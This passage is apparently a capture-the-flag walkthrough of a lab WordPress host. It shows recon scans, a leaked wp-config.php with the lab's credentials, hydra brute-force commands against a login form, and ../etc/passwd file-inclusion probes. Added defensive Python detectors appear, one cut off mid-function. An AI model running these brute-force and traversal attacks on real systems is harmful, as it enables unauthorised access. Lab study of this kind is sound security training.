<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>

Port 7654 appears to be a web server?

$ nikto --host 192.168.2.24 --port 7654
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    192.168.2.24
+ Target Port:        7654
+ Start Time:         2021-03-01 16:01:58 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2021-03-01 16:02:21 (GMT-5) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ dirb http://192.168.2.24:7654 /usr/share/wordlists/dirb/big.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar  1 16:03:29 2021
URL_BASE: http://192.168.2.24:7654/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.2.24:7654/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/                                          
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/ ----
+ http://192.168.2.24:7654/apache/.htaccess (CODE:200|SIZE:235)                          
==> DIRECTORY: http://192.168.2.24:7654/apache/secret/                                   
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/                                
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/                                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/                               
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/                              
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/secret/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/                       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/                     
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/                    
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/                             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/images/                          
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/includes/                        
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/js/                              
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/maint/                           
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/network/                         
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/user/                            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/                       
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/themes/                        
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/certificates/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/css/                          
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/customize/                    
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/fonts/                        
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/                       
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/                           
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/widgets/                      
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/                   
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/images/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/includes/              
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/                    
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/maint/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/network/               
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/user/                  
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/themes/              
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/certificates/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/css/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/customize/          
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/fonts/              
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/widgets/            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/css/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/                      
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/images/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/includes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/js/widgets/                      
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/maint/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/network/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/user/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/plugins/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/               
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/themes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/certificates/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/css/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/customize/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/fonts/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/crystal/               
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/media/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/smilies/               
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/crop/                      
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/jquery/                    
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/swfupload/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/thickbox/                  
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/                   
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/images/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/includes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/widgets/            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/maint/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/network/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/user/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/     
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/themes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/certificates/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/css/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/customize/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/fonts/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/crystal/     
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/media/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/smilies/     
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/crop/            
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/jquery/          
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/swfupload/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/thickbox/        
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/tinymce/         
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/css/colors/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/blue/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/coffee/               
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/light/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/midnight/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/ocean/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/sunrise/              
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/js/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/ ----
+ http://192.168.2.24:7654/apache/wp-content/plugins/akismet/.htaccess (CODE:200|SIZE:629)
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/_inc/          
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/views/         
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/crystal/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/media/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/smilies/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/crop/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/jquery/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/jquery/ui/                 
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/swfupload/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/thickbox/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/langs/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/plugins/           
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/skins/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/themes/            
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/utils/             
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/blue/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/coffee/     
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/light/      
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/midnight/   
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/ocean/      
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/sunrise/    
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/ ----
+ http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/.htaccess (CODE:200|SIZE:629)
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/_inc/
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/views/
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/crystal/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/media/ ----
^C> Testing: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/media/new1

$ curl http://192.168.2.24:7654/apache/.htaccess         

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

$ nikto --host 192.168.2.24 --port 7654 --root /apache
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    192.168.2.24
+ Target Port:        7654
+ Target Path:        /apache
+ Start Time:         2021-03-01 16:10:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /apache/.htaccess: Contains configuration and/or authorization information
+ OSVDB-3092: /apache/xmlrpc.php: xmlrpc.php was found.
+ /apache/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ OSVDB-3092: /apache/license.txt: License file found may identify site software.
+ /apache/wp-login.php: Wordpress login found
+ 7917 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2021-03-01 16:10:13 (GMT-5) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

It honestly seems like this is the same content as on port 80 for the most part? Except there's a .htaccess, and the server hands us index.php files as raw source instead of executing them?

$ curl http://192.168.2.24:7654/apache/index.php
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Let’s take a closer look at that .htaccess gift:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
  • mod_rewrite is on
  • RewriteBase - ‘Sets the base URL for per-directory rewrites’
  • RewriteRule - ‘Defines rules for the rewriting engine’ - RewriteRule Pattern Substitution [flags]
  • Pattern is perl regex…
  • Flag [L] - The [L] flag causes mod_rewrite to stop processing the rule set. In most contexts, this means that if the rule matches, no further rules will be processed.
  • The “-” rewrite target tells mod_rewrite to pass the request through unchanged.

This is the default WordPress .htaccess, so on its own it is rather insignificant. However, we seem to have gained an arbitrary read of the PHP source on this port. Soooo maybe…

$ curl http://192.168.2.24:7654/apache/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'pwp_db');

/** MySQL database username */
define('DB_USER', 'pinkywp');

/** MySQL database password */
define('DB_PASSWORD', 'pinkydbpass_wp');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'S`^)1zOBZz`[email protected]}-y+9tG{m%[email protected])57(9Z)[email protected])@ACl_^[Tn2t*');
define('SECURE_AUTH_KEY',  'q)pPWTEBJ^_:)Q*TzNqBuXU-.1xRw:*bPZAR!L0/~wNcIa,[email protected]*s%fxT%u');
define('LOGGED_IN_KEY',    ' j?DW4M#v7ylAkQXec(/a]3XGA#broCltUdHx~iv1~I!-Y-Q!2jKpfaY=bp`&>dZ');
define('NONCE_KEY',        ':O~9!2,Pmq[KchnaftX8->[email protected]~fvi]v2WHZ|) /%njnNUQZ [email protected]{;gL');
define('AUTH_SALT',        'RG3oF>$b_0wA>[[N>{5|Kv=Q5s.PjvPsgG9(Uz?cLXi0:f`H;1:P%E=LdWVK}BIa');
define('SECURE_AUTH_SALT', '2^T8  nU>LG)6&7bp<[email protected]``}T#G^[email protected]]Zlc=qt60Uj^?}$-/Ru8en2;lz|s');
define('LOGGED_IN_SALT',   '4E)(%qnp+U39z%:332(kZ+:+3Obk{@A Q5MVtH-s]L!R!Q8yJ=03N$a,:[email protected];d=PD');
define('NONCE_SALT',       '9CF8=cB0N>Pbv NFeb1&]YbIV/%5h3KC&evIi~.d.Z^bprF7ldger$& j;,K)vBd');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Okay, we’ve found a database password! I wonder if it’ll work to login via ssh?

$ ssh [email protected] -p 4655
... nope ...
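What we just saw is a source-disclosure finding: the port-7654 front end returns wp-config.php (and index.php) as text instead of running it, so every constant in it is readable by anyone. Here is a small check a defender can run against their own sites, added for this write-up and not part of it; the sample bodies are constructed with placeholder values, and `check_url` is a hypothetical helper name.

```python
"""Detect PHP source disclosure and list which WordPress config constants leak.

Added example for this write-up. Sample bodies below are constructed; the values
in them are placeholders, not credentials from any real system."""
import re
import urllib.request

# Matches define('NAME', 'value') or define("NAME", "value") as written in wp-config.php.
DEFINE_RE = re.compile(r"""define\(\s*(['"])([A-Z0-9_]+)\1\s*,\s*(['"])(.*?)\3\s*\)""", re.S)

# Constants whose disclosure hands over DB access or lets cookies be forged.
SENSITIVE = {
    "DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST",
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
}


def is_php_source(body):
    """A working PHP handler never sends the opening tag to the client. If the body
    starts with it, the server is serving the script as a static file."""
    return body.lstrip().startswith("<?php")


def leaked_constants(body):
    """Names (never values) of sensitive WordPress constants defined in a leaked
    wp-config.php body, in order of appearance. Empty if the body is not PHP source."""
    if not is_php_source(body):
        return []
    return [m.group(2) for m in DEFINE_RE.finditer(body) if m.group(2) in SENSITIVE]


def check_url(url, timeout=10):
    """Hypothetical network helper: fetch a URL and report what it exposes.
    Not exercised by the constructed samples below."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return {"url": url, "php_source": is_php_source(body), "leaks": leaked_constants(body)}


# Constructed body shaped like the wp-config.php above, with placeholder values.
SAMPLE_LEAK = """<?php
/** The name of the database for WordPress */
define('DB_NAME', 'example_db');
define('DB_USER', 'example_user');
define('DB_PASSWORD', 'PLACEHOLDER-not-a-real-password');
define('DB_HOST', 'localhost');
define("AUTH_KEY", "PLACEHOLDER-salt");
define('WP_DEBUG', false);
$table_prefix = 'wp_';
"""

# Constructed body of a page the PHP handler actually rendered.
SAMPLE_RENDERED = "<html><head><title>Pinkys Database</title></head><body>ok</body></html>"

if __name__ == "__main__":
    print("leaked:", leaked_constants(SAMPLE_LEAK))      # sensitive names, no values
    print("rendered page leaks:", leaked_constants(SAMPLE_RENDERED))
```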

Alright… I’m not really finding anything that looks like a juicy attack surface, though. I don’t find the idea of brute-forcing the known username against the known hashes attractive.

I was poking around in the browser trying to figure out the nginx config, when I decided to change the IP to the hostname, and at root of the new webserver I get a link to a login page!

$ curl pinkydb:7654
<html>
	<head>
		<title>Pinkys Database</title>
	</head>
	<body>
		<center><a href="http://pinkydb:7654/login.php">Login</a>
	</body>


Oh yes, now this looks like something we can attack!

Exploitation

I re-ran nikto using this:

$ nikto --host pinkydb --port 7654                      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    pinkydb
+ Target Port:        7654
+ Start Time:         2021-03-01 17:02:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /login.php: Admin login page/section found.
+ 7683 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2021-03-01 17:02:25 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ curl -v pinkydb:7654/config.php
*   Trying 192.168.2.24:7654...
* Connected to pinkydb (192.168.2.24) port 7654 (#0)
> GET /config.php HTTP/1.1
> Host: pinkydb:7654
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.10.3
< Date: Mon, 01 Mar 2021 22:03:02 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< 
* Connection #0 to host pinkydb left intact

First, I tried the database account from the wp-config.php file on that login page… to no avail.

I tried sql injection here for quite some time… to no avail.

Alright, well let’s see if we can brute-force this then.

I think the username is either:
- pinky1337
- pinkydb
- pinky

Now, let’s take a moment to consider the password we’ve already seen… there may be a pattern here we can leverage. pinkydbpass_wp for wordpress. Eh, probably not overly useful.

Maybe the password is pinkydbpass or pinkydbpass_pinkydb? I tried, no luck.

Okay well, while I think, I’ll kick off an attempt with hydra using a common wordlist…

# Make user list
$ cat users.txt                   
pinky123
pinkydb
pinky
# Run hydra
$ hydra -L users.txt -P /usr/share/wordlists/metasploit/common_roots.txt -s 7654 pinkydb http-post-form  "/login.php:user=^USER^&pass=^PASS^:Invalid"
# Result edited in afterwards
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 17:27:02
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14175 login tries (l:3/p:4725), ~886 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid
[STATUS] 4481.00 tries/min, 4481 tries in 00:01h, 9694 to do in 00:03h, 16 active
[STATUS] 4561.00 tries/min, 9122 tries in 00:02h, 5053 to do in 00:02h, 16 active
[STATUS] 4586.00 tries/min, 13758 tries in 00:03h, 417 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 17:30:17

Alright, in the meantime, what else can we do… We have some samples of text the user has written; it’s a long shot, but we could craft a wordlist from that too.

$ cewl pinkydb > pass.txt
$  hydra -L users.txt -P pass.txt -s 7654 pinkydb http-post-form  "/login.php:user=^USER^&pass=^PASS^:Invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 17:31:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 504 login tries (l:3/p:168), ~32 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid
[7654][http-post-form] host: pinkydb   login: pinky   password: Passione
[7654][http-post-form] host: pinkydb   login: pinky123   password: CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
[7654][http-post-form] host: pinkydb   login: pinkydb   password: CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 17:31:46

Oh shit!!! Obviously I sucked at making the cewl list (its banner line ended up in pass.txt as a “password”), but the first one must’ve created a session? Let’s go try ourselves:

#Notes
- Stefano
- Intern Web developer
- Created RSA key for security for him to login

I downloaded the RSA key…

$ ssh stefano@192.168.2.24 -i ./id_rsa -p 4655
Enter passphrase for key './id_rsa': 
stefano@192.168.2.24's password: 
Permission denied, please try again.
stefano@192.168.2.24's password: 
Permission denied, please try again.
stefano@192.168.2.24's password: 
stefano@192.168.2.24: Permission denied (publickey,password).

But of course, it has a password! Hmmm…

Well, here are the available URLs at this little webapp:
- http://pinkydb:7654/pageegap.php?1337=filesselif1001.php
- http://pinkydb:7654/credentialsdir1425364865/notes.txt
- http://pinkydb:7654/credentialsdir1425364865/id_rsa

The first one looks like we should be able to get LFI right? I tried:
- =../etc/passwd
- =../../etc/passwd
- =../../../etc/passwd
- =../../../../etc/passwd
- =/etc/passwd


Okay sweet, now we can read any file on the server, and we’ve got a user list! But this still doesn’t help us get a shell directly…
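Both techniques used so far, the hydra run against /login.php and the traversal probing of pageegap.php?1337=, leave a loud trail in the web server's access log. As an added example that is not part of this write-up, here is detection logic in Python run over constructed nginx log lines (IPs, timestamps and user agents are made up).

```python
"""Detection over nginx access logs for a login brute-force burst and for
directory traversal in query parameters. Added example; sample log lines are
constructed in nginx "combined" format and do not come from any real host."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# ip - user [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def login_bursts(entries, path="/login.php", window_s=60, threshold=20):
    """Map ip -> peak number of POSTs to `path` inside any window_s-second window,
    keeping only IPs at or above threshold. Hydra managed ~4500 tries/min in the
    write-up, so even a conservative threshold separates it from human logins."""
    per_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["target"].partition("?")[0] == path:
            per_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        peak, lo = 0, 0
        for hi, t in enumerate(stamps):          # sliding window over sorted times
            while t - stamps[lo] > timedelta(seconds=window_s):
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def traversal_hits(entries):
    """Return (ip, raw target) for requests whose query values contain ../ style
    traversal or an absolute path. URL-decoding is applied twice so that
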